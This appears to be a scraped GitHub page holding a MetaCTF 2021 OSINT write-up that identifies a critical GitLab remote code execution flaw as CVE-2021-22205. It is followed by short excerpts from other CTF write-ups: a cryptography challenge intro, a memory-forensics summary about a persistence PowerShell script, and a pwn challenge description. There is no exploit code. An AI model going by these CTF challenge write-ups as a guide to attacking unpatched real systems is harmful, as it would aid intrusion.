<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>Meta games CTF 2021</span></span><span>/</span><span><span>OSINT</span></span><span>/</span>Sugar we're goin up.md </h2> Go to file <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span></button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="Meta games CTF 2021/OSINT/Sugar we're goin up.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details></div>
<div id="spoof-warning" class="mt-0 pb-3" hidden aria-hidden> <div data-view-component="true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg>
<div class="overflow-hidden">This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.</div>
</div></div>
<include-fragment src="/palanioffcl/CTF-Writeups/spoofed_commit_check/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2" data-test-selector="spoofed-commit-check"></include-fragment>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/palanioffcl/CTF-Writeups/contributors/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment></div>
<readme-toc>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header js-blob-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" >
<details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md","user_id":null}}" data-menu-hydro-click-hmac="af6b50e60a93cd270e8eeeeb2f6fcf8cae5507980d887b4e1173c2868f434e82" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary>
<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">
<div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> MetaCTF 2021 Sugar, We're Goin Up (125pts) Description: G00gling: Flag: </div> </div> </details-menu></details>
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
24 lines (13 sloc) <span></span> 849 Bytes </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div class="BtnGroup"> Raw Blame </div>
<div class="d-flex"> <div class="ml-1" > </option></form><form class="BtnGroup-parent js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="qGhdifU9da6xI3msZmk1Xie2iE48FdoMa0HWkgOZK5Fqw9ultCVGqNFjmL2jsQHsZe8KKecBELnuuFpxNsoGuw" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" data-hotkey="e" data-disable-with="" type="submit" data-view-component="true" class="btn-sm BtnGroup-item btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></button></form> <details class="details-reset details-overlay select-menu BtnGroup-parent d-inline-block position-relative"> <summary data-disable-invalid="" data-disable-with="" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":false}}" aria-label="Select additional options" data-view-component="true" class="js-blob-dropdown-click select-menu-button btn-sm btn BtnGroup-item float-none px-2"></summary> <div class="SelectMenu right-0"> <div class="SelectMenu-modal width-full"> <div class="SelectMenu-list SelectMenu-list--borderless py-2"> </option></form><form class="SelectMenu-item js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/OSINT/Sugar%20we're%20goin%20up.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="GyE-jFb9AWV_pcwrvqmCc2XZSklPWKYr_WCzJU372dHZirigF-UyYx_lLTp7cbbBJ4DILpRMbJ54mT_GeKj0-w" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" type="submit" data-view-component="true" class="btn-invisible btn width-full d-flex flex-justify-between color-fg-muted text-normal p-0"> <div class="mr-5">Edit this file</div> <div class="color-fg-muted">E</div></button></form>
<button aria-label="You must be on a branch to open this file in GitHub Desktop" data-platforms="windows,mac" disabled="disabled" type="submit" data-view-component="true" class="SelectMenu-item no-wrap js-remove-unless-platform btn-invisible btn text-normal"> Open in GitHub Desktop</button> </div> </div> </div> </details></div>
<div > </div>
<button class="btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw" disabled aria-label="You must be signed in to make or propose changes" type="button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg> </button> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="js-blob-dropdown-click btn-octicon p-2" aria-haspopup="true" aria-label="possible actions" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":true}}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> </summary>
View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>MetaCTF 2021</h1><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Sugar, We're Goin Up (125pts)</h2><h3 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description:</h3><blockquote>In September 2021, GitLab upgraded the CVSSv3 score for a critical remote code execution vulnerability to 10.0, the highest possible score. Although a patch was released in April, numerous public-facing, unpatched GitLab instances remain vulnerable.</blockquote>What is the CVE number for this critical, actively exploited vulnerability? The flag format will be CVE-XXXX-XXXX.<h3 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>G00gling:</h3>By using Google we can search for a GitLab RCE vulnerability and check out anything recent.Sure enough, the first result talks about a patch released in April and an upgraded CVSSv3 score.Certainly, this is our intended CVE.<h3 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag:</h3><div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="CVE-2021-22205">CVE-2021-22205</div></article> </div>
In September 2021, GitLab upgraded the CVSSv3 score for a critical remote code execution vulnerability to 10.0, the highest possible score. Although a patch was released in April, numerous public-facing, unpatched GitLab instances remain vulnerable.
What is the CVE number for this critical, actively exploited vulnerability? The flag format will be CVE-XXXX-XXXX.
By using Google we can search for a GitLab RCE vulnerability and check out anything recent.
Sure enough, the first result talks about a patch released in April and an upgraded CVSSv3 score.
Certainly, this is our intended CVE.
</div>
</readme-toc>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump overflow-hidden" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" data-turbo="false" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go</button></form> </details-dialog> </details>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
**Full write-up (+files):** [https://www.sebven.com/ctf/2021/11/16/K3RN3LCTF2021-Poly-Expo-go-BRRRRR.html](https://www.sebven.com/ctf/2021/11/16/K3RN3LCTF2021-Poly-Expo-go-BRRRRR.html)
Cryptography – 494 pts (9 solves) – Chall author: Polymero (me)
“I’m going to say this again: I did not have sexual relations with that polynomial, Miss Polinsky.”
Files: polyexpogobrrrrr.sage
This challenge was part of our very first CTF, K3RN3LCTF 2021. |
## SummaryPersist was the forensics challenge released on day 3, where we’re given a memory dump of Santa’s computer, which reportedly has a “slow boot time and a blue window popping up for a split second during startup”. We’ll take this as a cue to investigate AutoRun Persistence in Windows, and find a Volatility plugin called “winesap” which will show us a number of registry keys, one of which that contains a suspicious PowerShell script that we can decode to get the flag. Refer to the writeup [here](https://an00brektn.github.io/htb-santa-persist/) for more detail. |
# Little Boi
The description for this challenge is as follows:
*With a program this small, there isn't a chance you can find an exploit... right? Here's the Little Boi.*
